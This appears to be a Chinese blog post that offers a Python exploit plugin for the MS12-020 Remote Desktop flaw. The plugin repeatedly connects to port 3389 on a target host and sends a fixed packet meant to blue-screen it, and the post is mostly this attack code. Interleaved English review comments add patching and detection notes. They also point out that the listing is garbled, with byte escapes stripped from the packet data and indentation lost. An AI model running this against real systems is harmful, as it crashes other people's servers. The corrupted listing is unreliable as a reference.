MS12-020 远程 3389 蓝屏攻击插件（Python 版本）

以下代码 保存为 qingms12020.py

传送门:http://mstoor.duapp.com/view/?pid=16

[code lang="python"]
# -*- coding: cp936 -*-
'''
mst=>plugin=>exploit
ms12_020
'''
from socket import *
# Plugin class for the "mst" framework (module docstring: mst=>plugin=>exploit).
# Per its own metadata it targets the RDP issue covered by Microsoft bulletin
# MS12-020 and aims to blue-screen (crash) the remote host, i.e. a denial of
# service against the RDP service on TCP 3389.
# NOTE(review): the listing on this page has lost all indentation, so the
# nesting of the statements below cannot be read off the text; it also uses
# Python 2-only syntax (`except Exception,e`).
# Defensive context: installing the MS12-020 update removes the exposure.
# Keeping 3389 off untrusted networks and requiring Network Level
# Authentication limit who can reach RDP before authenticating -- this code
# sends its data straight after connect(), with no credentials involved.
class mstplugin:
'''ms12_020'''
# Plugin metadata as [label, value] pairs; the labels are, in order:
# plugin name, author, last update, website.
infos = [
['插件','ms12_020 远程3389蓝屏Exploit'],
['作者','mst'],
['更新','2013/10/22'],
['网址','http://mstoor.duapp.com/']
]
# Option table as [name, default, description] triples. exploit() reads
# RHOST, RPORT, TIMES and TIMEOUT as bare names -- presumably the framework
# injects the chosen values into this module's namespace; confirm against the
# loader. PAYLOAD is declared here but not read anywhere in this listing.
opts = [
['RHOST','192.168.1.2','REMOTE HOST'],
['RPORT','3389','REMOTE PORT'],
['TIMES','100','SEND BUF TIMES'],
['TIMEOUT','5','SOCK SETTIMEOUT'],
['PAYLOAD','false','NO RETURN PAYLOAD']
]
# Fixed data blob that exploit() sends unchanged on every connection.
# NOTE(review): as printed on this page the literals contain no escape
# sequences at all, so `buf` here is ordinary ASCII text rather than a binary
# protocol message; this listing is not a faithful copy of the original file.
buf=""
buf+="x03x00x00x13x0exe0x00x00"
buf+="x00x00x00x01x00x08x00x00"
buf+="x00x00x00x03x00x01xd6x02"
buf+="xf0x80x7fx65x82x01x94x04"
buf+="x01x01x04x01x01x01x01xff"
buf+="x30x19x02x04x00x00x00x00"
buf+="x02x04x00x00x00x02x02x04"
buf+="x00x00x00x00x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="xffxffx02x04x00x00x00x02"
buf+="x30x19x02x04x00x00x00x01"
buf+="x02x04x00x00x00x01x02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x01x02x04x00x00x00x00"
buf+="x02x04x00x00x00x01x02x02"
buf+="x04x20x02x04x00x00x00x02"
buf+="x30x1cx02x02xffxffx02x02"
buf+="xfcx17x02x02xffxffx02x04"
buf+="x00x00x00x01x02x04x00x00"
buf+="x00x00x02x04x00x00x00x01"
buf+="x02x02xffxffx02x04x00x00"
buf+="x00x02x04x82x01x33x00x05"
buf+="x00x14x7cx00x01x81x2ax00"
buf+="x08x00x10x00x01xc0x00x44"
buf+="x75x63x61x81x1cx01xc0xd8"
buf+="x00x04x00x08x00x80x02xe0"
buf+="x01x01xcax03xaax09x04x00"
buf+="x00xcex0ex00x00x48x00x4f"
buf+="x00x53x00x54x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04x00x00"
buf+="x00x00x00x00x00x0cx00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x01xcax01x00x00x00x00"
buf+="x00x10x00x07x00x01x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x30x00x30"
buf+="x00x2dx00x30x00x30x00x30"
buf+="x00x30x00x30x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x00x00x00"
buf+="x00x00x00x00x00x04xc0x0c"
buf+="x00x0dx00x00x00x00x00x00"
buf+="x00x02xc0x0cx00x1bx00x00"
buf+="x00x00x00x00x00x03xc0x2c"
buf+="x00x03x00x00x00x72x64x70"
buf+="x64x72x00x00x00x00x00x80"
buf+="x80x63x6cx69x70x72x64x72"
buf+="x00x00x00xa0xc0x72x64x70"
buf+="x73x6ex64x00x00x00x00x00"
buf+="xc0x03x00x00x0cx02xf0x80"
buf+="x04x01x00x01x00x03x00x00"
buf+="x08x02xf0x80x28x03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xefx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xebx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xecx03x00x00x0cx02xf0x80"
buf+="x38x00x06x03xedx03x00x00"
buf+="x0cx02xf0x80x38x00x06x03"
buf+="xeex03x00x00x0bx06xd0x00"
buf+="x00x12x34x00"
# Plugin entry point: repeats one connect / send / receive cycle TIMES times.
# `color`, YELLOW, GREEN and RED are not defined or imported in this listing
# -- presumably supplied by the hosting framework; confirm.
# Detection note: each iteration opens a fresh TCP connection to RPORT and
# sends the same fixed blob, so a run shows up as a burst of short-lived
# connections to 3389 from one source carrying identical first payloads
# (TIMES defaults to 100 in `opts`).
def exploit(self):
'''start exploit'''
color.cprint("[+] Connect to %s .."%RHOST,YELLOW)
# Option values are used as strings and converted with int() at each use.
for i in range(int(TIMES)):
# A new stream socket is created for every iteration.
s=socket(AF_INET,SOCK_STREAM)
s.settimeout(int(TIMEOUT))
try:
s.connect((RHOST,int(RPORT)))
color.cprint("[+] Send %-5s Bytes.."%len(self.buf),GREEN)
# send() is called once and its return value is ignored.
s.send(self.buf)
# Reads at most 100 bytes of reply; only the length is reported.
rec=s.recv(100)
color.cprint("[+] Recv %-5s Bytes.."%len(rec),YELLOW)
# NOTE(review): close() is listed before the except clause, so it
# presumably runs only on the success path and a failed iteration leaves
# its socket open -- cannot be confirmed with the indentation lost.
s.close()
# Python 2-only except syntax; any error is printed and not re-raised.
except Exception,e:
color.cprint("[!] Exploit False !CODE:%s"%e,RED)

[/code]
